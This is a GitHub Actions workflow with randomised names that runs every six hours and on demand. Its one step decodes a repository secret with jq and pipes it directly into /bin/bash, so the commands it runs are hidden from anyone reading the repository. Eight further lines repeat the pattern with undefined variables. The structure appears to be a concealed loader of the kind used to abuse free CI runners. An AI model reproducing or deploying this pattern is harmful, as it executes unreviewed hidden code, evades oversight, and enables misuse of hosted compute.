name: gantingxi3810
on:
  workflow_dispatch:
  schedule:
    - cron: '40 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gantingxi3810
        env:
          qjz20849: ${{ secrets.qjz20849 }}
        run: |
          echo $qjz20849 | jq -r .vwtro39 | /bin/bash
          echo $ldu0 | jq -r .ks80316 | /bin/bash
          echo $cdr5 | jq -r .rc1 | /bin/bash
          echo $fqoj66592 | jq -r .pueu400 | /bin/bash
          echo $zpc41 | jq -r .zbgfo172 | /bin/bash
          echo $guny520 | jq -r .twcve50644 | /bin/bash
          echo $qihe68561 | jq -r .sjdix7 | /bin/bash
          echo $pjgx76879 | jq -r .w52 | /bin/bash
          echo $p89671 | jq -r .hzce98464 | /bin/bash

